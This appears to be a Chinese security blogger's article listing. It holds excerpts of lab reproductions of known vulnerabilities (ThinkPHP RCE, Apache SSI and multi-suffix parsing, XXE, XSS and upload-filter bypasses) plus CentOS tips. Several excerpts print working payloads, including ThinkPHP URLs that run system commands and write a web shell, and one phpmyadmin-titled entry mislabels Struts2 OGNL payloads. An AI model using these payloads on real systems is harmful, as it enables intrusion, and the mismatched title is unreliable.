- 博客(15)
- 收藏
- 关注
原创 漏洞复现之(MS17-010)
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
2022-11-02 11:42:37
2946
原创 xxe漏洞原理,简单复现及防御
xxe漏洞原理Web应用的脚本代码没有限制XML引入外部实体,从而导致测试者可以创建一个包含外部实体的XML,使得其中的内容会被服务器端执行 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害xxe联系靶场http://web.jarvisoj.com:9882/复现步骤打开代理进行抓包操作明显看到使用的是json读取我们将包放进重发模块修改成xml读取方式读取flag包<?xml versio..
2022-04-11 21:53:20
1164
原创 Apache HTTPD 多后缀解析漏洞复现
漏洞描述Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞和apache版本和php版本无关,属于用户配置不当造成的解析漏洞漏洞原理由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没
2022-03-18 19:48:35
402
原创 Apache SSI 远程命令执行漏洞复现
漏洞原理目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。漏洞复现1、docker内漏洞位置 httpd/ssi-rce执行命令dock
2022-03-18 19:37:44
4258
原创 在centos7中下载搜狗输入法
关闭ibus输入法,绝对不能使用“yum remove ibus”命令卸载ibus, 否则会将桌面环境一同卸载掉# mv /usr/bin/ibus-daemon /usr/bin/ibus-daemon.bak安装fcitx# yum install libQtWebKit* fcitx fcitx-libs fcitx-qt4 fcitx-qt5 fcitx-configtool fcitx-table fcitx-table-chinese# 配置环境变量(主要是为了解决GTK..
2022-03-07 19:52:21
731
原创 太长时间没有使用centos7 linux,从而忘记自己root用户所设置的密码,通过何种方式登录到此操作系统
打开虚拟机centos7点击e键进入编辑页面2 通过上下键找到Linux16开头的最后,输入init=/bin/sh3 输入完成后,按快捷键:Ctrl+x 进入单用户界面4 输入mount-o remount , rw/命令注意空格5 输入passwdroot命令对root进行密码修改6 两次密码都是无法显示的,图中出现情况是因为密码太简单7 输入exec /sbin/init 命令等待修改密码重新登陆即可,这里是命...
2022-03-07 19:47:01
492
原创 vulhub Apache HTTPD 多后缀解析漏洞漏洞复现
1 通过vulhub打开环境2 编写解析文件3 更改文件后缀4 上传文件5 访问获取的地址实验结束
2022-03-05 18:51:05
378
原创 phpmyadmin scripts/setup.php 反序列化漏洞复现
首先在password地方输入%{1+1}发现解析成了2,说明存在该漏洞输入 %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 获取Tomcat执行路径获取web路径%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatch..
2022-02-23 19:06:51
2084
原创 phpmyadmin scripts/setup.php 反序列化漏洞复现
打开代理使用bp抓包,构造postPOST/scripts/setup.phpHTTP/1.1Host:your-ip:8080Accept-Encoding:gzip,deflateAccept:*/*Accept-Language:enUser-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1;Win64;x64;Trident/5.0)Connection:closeContent-Type:...
2022-02-23 18:39:36
215
原创 复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
执行whoami/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1...
2022-02-21 19:24:27
2793
原创 复现ThinkPHP5 5.0.23远程代码执行漏洞
访问/index.php?s=captcha页面,会出现如下报错:执行whoami查看当前目录_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd写入一句话木马并访问aaabbb 这里使用Base64 编码:_method=__construct&filter[]=system&method=get&server[RE...
2022-02-21 18:56:13
3561
原创 xss挑战之旅less5-less10,步骤加截图。
5.欢迎来到level56.变换大小写绕过 "> <SCRIpt>alert(6)</SCriPT>7.双写绕过"><scscriptript>alert(7)<sriscriptpt>"><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>//8."script"转换为"scr_ipt","on"转换为"o_n","src"转换.
2022-02-17 15:35:55
300
原创 upload-labs 第四关-第九关 操作步骤配截图
4.先上传一个.htaccess文件,再上传文件5.抓包后面加..6.抓包后缀用PHP7.抓包在php后面加个空格8.抓包php后缀加.9.抓包后缀加上::$DATA
2022-02-13 11:20:29
869
原创 使用docker搭建sqli-lab环境以及upload-labs环境,操作步骤配截图。
搭建sqli-lab(1)查找sqli-lab环境 docker search sqli-labs(2)拉取镜像 docker pull acgpiano/sqli-labs(3)查看镜像docker images运行目标镜像docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs(4)打开火狐查看127.0.0.1搭建upload-labs(1)查找镜像docker search upload-l..
2022-02-11 17:34:42
1589
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人